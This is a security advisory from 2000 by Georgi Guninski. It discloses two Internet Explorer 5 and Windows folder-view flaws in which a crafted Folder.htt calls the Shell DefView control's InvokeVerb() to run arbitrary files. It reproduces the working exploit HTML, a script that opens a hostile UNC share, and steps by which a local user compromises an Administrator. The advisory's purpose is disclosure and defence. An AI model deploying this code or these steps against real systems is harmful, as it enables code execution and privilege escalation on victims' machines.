Subject: [NT] IE executes arbitrary files thru Microsoft Network
Date: Thu, 17 Aug 2000 07:34:38 +0200

          IE executes arbitrary files thru Microsoft Network
--------------------------------------------------------------------------------

SUMMARY

This advisory contains two issues, but since they use common ActiveX
control and concept, they are published in one advisory:
1) IE 5.x may execute arbitrary programs when visiting a web page, reading
HTML based mail with Outlook or simply browsing folders as web pages
(which is the default configuration for Windows).
2) Local Administrator compromise on default installation of Windows 2000.
Have not tested with IE 5.5 installed, but it's believed to work. In order
to be compromised, the Administrator must open a local folder as a web
page (which is the default option when browsing folders).
In both cases a malicious person may take full control over user's
computer/server.

DETAILS

It is well known that browsing web sites and reading HTML mail may be
dangerous, but it turns out that browsing local or remote folders is
dangerous just as well. These exploits use a feature of Windows 98/2000
that allows viewing folders as web pages due to the integration of IE in
the operating system.
This allows putting active content when browsing both local and remote
folders, which enables attackers to launch active content based attacks.
The way the folder looks when viewed as a web page is controlled by the
file Folder.htt (located in the folder). This is a special HTML file that
may contain Active Scripting and ActiveX Objects.
If you want to view the files in the folder, you must use an ActiveX
Control  - Shell DefView, which basically contains the functionality of
the old Explorer.
The Shell DefView Control has an interesting method - InvokeVerb, which is
used to perform actions with the currently selected file - for example
showing its properties and the most interesting part - opening/executed
it.
It has a string parameter - the action to perform on a file or folder.
Microsoft has tried to secure it - it yields a security error if you pass
an argument to it and that is reasonable.
But amazingly, if you just do InvokeVerb() with no parameters - it
executes the default action on the file/folder and the action is Open
(Execute).
So, to exploit this we create a folder and place a malicious file that we
want to execute - for example "a.bat". Also in that folder, we put the
active file Folder.htt.

The code of Foder.htt:
<html>
<body >
<script>
setTimeout("f()",2000);
function f() {
     FileList.focus();
     FileList.FocusedItem.InvokeVerb();
}
</script>
<H1>Hello World<BR>Written by Georgi Guninski</H1>
<object id=FileList border=0 tabindex=1
classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">
</object>
</body>
</html>

What the code does:
FileList.focus() focuses the first file in our folder - in our example
a.bat. Note: a.bat may be not the first file in our folder - this depends
on the arrangement of the icons in the folder (default is by name). But to
circumvent this we may put additional files with different
names/dates/extensions so whatever the arrangement is, our target file is
first in the list.
FileList.FocusedItem.InvokeVerb() does the real job - it opens(executes)
the focused file.
So we create a customized folder with malicious content, place it
somewhere (probably remote) and wait or force a victim to open it.

Demonstration:
A demonstration package is available at:
 <http://www.nat.bg/~joro/ac.zip> http://www.nat.bg/~joro/ac.zip

For (1) IE 5.x may execute arbitrary files when visiting a web page,
reading HTML based mail with Outlook or simply browsing folders (that may
be remote) as web pages (which is the default configuration for Windows).
To test it remotely with Windows 98:
Unzip ac.zip in a UNC share for example: \\HOSTILEUNCORIP\SHARE
Browse \\HOSTILEUNCORIP\SHARE as a web page from IE.

Or open a web page containing:
<SCRIPT>
window.open("\\\\HOSTILEUNCORIP\\SHARE");
</SCRIPT>

Now for the second vulnerability (local administrator compromise on
default installation of Windows 2000). In order to be compromised, the
Administrator must open a local folder as a web page (which is the default
option when browsing folders). A local user may create a customized folder
and if the Administrator opens it as a web page (which is default) then
the administrator account is compromised.
It is amazing that when the Administrator opens the folder a security
warning
"...may be unsafe...Do you want to allow it to be initialized an accessed
by scripts?" with "Yes/No" buttons appears. However, whichever button you
choose, the content is executed.

To see the second exploit in action:
As an ordinary user, unzip ac.zip in any folder, for example ac.
1) Open ac from My Computer
2) Select View->Customize this Folder->Next->Customize->Choose or
edit...->Next
3) Select Choose a template->Current->Next->Finish

Wait for the Administrator to open the folder as a web page.

Workaround:
Do not browse folders as web pages.

ADDITIONAL INFORMATION

The information has been provided by  <mailto:joro@NAT.BG> Georgi
Guninski.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.